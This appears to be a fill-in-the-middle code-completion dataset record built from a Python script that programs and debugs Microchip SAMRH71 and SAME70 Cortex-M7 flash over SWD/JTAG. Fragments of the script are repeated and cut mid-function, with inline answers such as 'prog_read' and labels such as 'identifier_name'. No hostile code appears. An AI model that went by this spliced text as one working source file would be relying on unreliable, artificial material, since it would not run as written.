for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakopint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
|
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab
dev.Disconnect()
| reset_and_halt() | identifier_body |
dap_cortex-m7.py | efc_cmd_getd = 0x5a000000
efc_cmd_wp = 0x5a000001
efc_cmd_wpl = 0x5a000002
efc_cmd_ea = 0x5a000005
efc_cmd_epa = 0x5a000007
efc_cmd_slb = 0x5a000008
efc_cmd_clb = 0x5a000009
efc_cmd_glb = 0x5a00000A
efc_cmd_sgpb = 0x5a00000B
efc_cmd_cgpb = 0x5a00000C
efc_cmd_ggpb = 0x5a00000D
if "RH71" in device:
FLASH_START = 0x10000000
PAGE_SIZE = 256
GPNVM_BIT_MASK = 0x2 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x40004000 # HEFC Flash Mode Register
efc_fcr = 0x40004004 # HEFC Flash Command Register
efc_fsr = 0x40004008 # HEFC Flash Status Register
efc_frr = 0x4000400c # HEFC Flash Result Register
efc_fpmr = 0x40004040 # HEFC Flash Power Management Register
efc_wpmr = 0x400040e4 # HEFC Write Protection Mode Register
efc_cmd_ep = 0x5a000006 # available on SAMRH71, but not available on Canopus (SAME70, S70, V70/71)
rstc_cr = 0x40100200
rstc_sr = 0x40100204
rstc_mr = 0x40100208
else:
FLASH_START = 0x0400000
PAGE_SIZE = 512
GPNVM_BIT_MASK = 0x183 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x400e0c00 # EEFC Flash Mode Register
efc_fcr = 0x400e0c04 # EEFC Flash Command Register
efc_fsr = 0x400e0c08 # EEFC Flash Status Register
efc_frr = 0x400e0c0c # EEFC Flash Result Register
efc_wpmr = 0x400e0ce4 # EEFC Write Protection Mode Register
efc_cmd_ewp = 0x5a000003 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
efc_cmd_ewpl = 0x5a000004 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
rstc_cr = 0x400e1800
rstc_sr = 0x400e1804
rstc_mr = 0x400e1808
# Flash strategy
# 0: Halt before programming/read mem operations, run afterwards
# 1: Reset and halt before programming/read mem operations, release from reset afterwards
if "RH71" in device:
flash_strategy = 0
else:
flash_strategy = 1
was_running = False
did_read_operation = False
need_reset_for_read_operations = False
# Workarounds for flash bank startup after reset problems with SAMRH71F20-EK board rev 2.0
rh71_2_0_workaround_VAR_factor = True
rh71_2_0_workaround_init_PC_SP = True
rh71_2_0_workaround_reset_30ms_delay = True
def begin_communication_session():
dev.SetApiLogging(1)
log.setShowOutput(False)
global comm_iface, comm_speed
try:
comm_iface = True if settings["communication.interface"].lower()=="swd" else False
comm_speed = 8000000 if settings["communication.autoselectspeed"] else settings["communication.frequency"]
except:
comm_iface = True
comm_speed = 8000000
def begin_programming_operation():
log.info("begin_programming_operation, interface: %s, freq: %d" % ("SWD" if comm_iface else "JTAG", comm_speed))
dev.Connect(comm_iface, comm_speed)
global was_running
was_running = False
global did_read_operation
did_read_operation = False
if is_target_running():
was_running = True
halt_or_raise()
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 use SYSRESETREQ to reset core + peripherals, will loose connection so need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus use RSTC (PROCRST) to reset peripherals and VECTRESET to reset core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# reset problem for flash (for rev 2.0 of device), can read flash only every second reset
# without this workaround
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if not flash is erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if not flash is erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Converting value to indexing access, and writing one GPNVM bit at the time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def | (type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakopint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
reset_and_halt()
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab
dev.Disconnect()
| prog_read | identifier_name |
dap_cortex-m7.py | efc_cmd_getd = 0x5a000000
efc_cmd_wp = 0x5a000001
efc_cmd_wpl = 0x5a000002
efc_cmd_ea = 0x5a000005
efc_cmd_epa = 0x5a000007
efc_cmd_slb = 0x5a000008
efc_cmd_clb = 0x5a000009
efc_cmd_glb = 0x5a00000A
efc_cmd_sgpb = 0x5a00000B
efc_cmd_cgpb = 0x5a00000C
efc_cmd_ggpb = 0x5a00000D
if "RH71" in device:
FLASH_START = 0x10000000
PAGE_SIZE = 256
GPNVM_BIT_MASK = 0x2 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x40004000 # HEFC Flash Mode Register
efc_fcr = 0x40004004 # HEFC Flash Command Register
efc_fsr = 0x40004008 # HEFC Flash Status Register
efc_frr = 0x4000400c # HEFC Flash Result Register
efc_fpmr = 0x40004040 # HEFC Flash Power Management Register
efc_wpmr = 0x400040e4 # HEFC Write Protection Mode Register
efc_cmd_ep = 0x5a000006 # available on SAMRH71, but not available on Canopus (SAME70, S70, V70/71)
rstc_cr = 0x40100200
rstc_sr = 0x40100204
rstc_mr = 0x40100208
else:
FLASH_START = 0x0400000
PAGE_SIZE = 512
GPNVM_BIT_MASK = 0x183 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x400e0c00 # EEFC Flash Mode Register
efc_fcr = 0x400e0c04 # EEFC Flash Command Register
efc_fsr = 0x400e0c08 # EEFC Flash Status Register
efc_frr = 0x400e0c0c # EEFC Flash Result Register
efc_wpmr = 0x400e0ce4 # EEFC Write Protection Mode Register
efc_cmd_ewp = 0x5a000003 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
efc_cmd_ewpl = 0x5a000004 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
rstc_cr = 0x400e1800
rstc_sr = 0x400e1804
rstc_mr = 0x400e1808
# Flash strategy
# 0: Halt before programming/read mem operations, run afterwards
# 1: Reset and halt before programming/read mem operations, release from reset afterwards
if "RH71" in device:
flash_strategy = 0
else:
flash_strategy = 1
was_running = False
did_read_operation = False
need_reset_for_read_operations = False
# Workarounds for flash bank startup after reset problems with SAMRH71F20-EK board rev 2.0
rh71_2_0_workaround_VAR_factor = True
rh71_2_0_workaround_init_PC_SP = True
rh71_2_0_workaround_reset_30ms_delay = True
def begin_communication_session():
dev.SetApiLogging(1)
log.setShowOutput(False)
global comm_iface, comm_speed
try:
comm_iface = True if settings["communication.interface"].lower()=="swd" else False
comm_speed = 8000000 if settings["communication.autoselectspeed"] else settings["communication.frequency"]
except:
comm_iface = True
comm_speed = 8000000
def begin_programming_operation():
log.info("begin_programming_operation, interface: %s, freq: %d" % ("SWD" if comm_iface else "JTAG", comm_speed))
dev.Connect(comm_iface, comm_speed)
global was_running
was_running = False
global did_read_operation
did_read_operation = False
if is_target_running():
|
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 use SYSRESETREQ to reset core + peripherals, will loose connection so need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus use RSTC (PROCRST) to reset peripherals and VECTRESET to reset core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
